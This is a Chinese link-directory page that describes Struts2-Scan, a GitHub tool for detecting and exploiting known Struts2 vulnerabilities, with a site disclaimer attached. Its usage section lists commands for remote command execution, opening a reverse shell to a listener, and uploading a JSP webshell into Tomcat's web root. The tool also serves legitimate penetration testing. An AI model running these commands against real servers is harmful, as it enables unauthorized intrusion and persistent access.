Github项目

Struts2-Scan:Struts2漏洞扫描利用工具

Struts2 - Scan是一个基于互联网上已公开的Struts2高危漏洞exp的扫描利用工具。它能支持多种Struts2漏洞检测,包括S2 - 001、S2 - 003等众多漏洞。支持单个和批量URL检测,还可进...

标签:

【Github】项目名:Struts2-Scan:Struts2漏洞扫描利用工具

一、项目简介

Struts2 – Scan是一个基于互联网上已公开的Struts2高危漏洞exp的扫描利用工具。它能够支持多种Struts2漏洞的检测,如S2 – 001、S2 – 003等众多漏洞。支持单个URL漏洞检测和批量URL检测,还能进行指定漏洞利用,可获取WEB路径、执行命令、反弹shell和上传文件(注意并非所有漏洞均支持上述全部功能)。

二、运行环境与依赖

运行环境要求Python3.6.X及其以上版本,需要click、requests、bs4等第三方库。测试环境为Ubuntu16.04。

三、工具参数说明

1. 查看漏洞详细信息:使用python3 Struts2Scan.py –info。
2. 单个URL漏洞检测:如python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action。
3. 批量漏洞检测:例如python3 Struts2Scan.py -f urls.txt。
4. POST数据:可以通过python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -d name=admin&email=admin&age={exp}。
5. 指定漏洞名称利用:
– 命令执行:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –exec。
– 反弹shell:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –reverse 192.168.100.8:8888。
– 获取WEB路径:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –webpath。
– 上传shell:python3 Struts2Scan.py -u http://192.168.100.8:8080/index.action -n S2 – 016 –upfile shell.jsp –uppath /usr/local/tomcat/webapps/ROOT/shell.jsp。

四、项目总结

Struts2 – Scan是一款功能较为全面的Struts2漏洞扫描利用工具,对于检测Struts2漏洞有着重要的意义。欢迎大家留言分享使用体验或者提出改进建议。

项目地址

GitHub链接直达

数据统计

数据评估

Struts2-Scan:Struts2漏洞扫描利用工具浏览人数已经达到8,如你需要查询该站的相关权重信息,可以点击"5118数据""爱站数据""Chinaz数据"进入;以目前的网站数据参考,建议大家请以爱站数据为准,更多网站价值评估因素如:Struts2-Scan:Struts2漏洞扫描利用工具的访问速度、搜索引擎收录以及索引量、用户体验等;当然要评估一个站的价值,最主要还是需要根据您自身的需求以及需要,一些确切的数据则需要找Struts2-Scan:Struts2漏洞扫描利用工具的站长进行洽谈提供。如该站的IP、PV、跳出率等!

关于Struts2-Scan:Struts2漏洞扫描利用工具特别声明

本站链氪巴士提供的Struts2-Scan:Struts2漏洞扫描利用工具都来源于网络,不保证外部链接的准确性和完整性,同时,对于该外部链接的指向,不由链氪巴士实际控制,在2024年12月6日 上午12:00收录时,该网页上的内容,都属于合规合法,后期网页的内容如出现违规,可以直接联系网站管理员进行删除,链氪巴士不承担任何责任。

相关导航

暂无评论

暂无评论...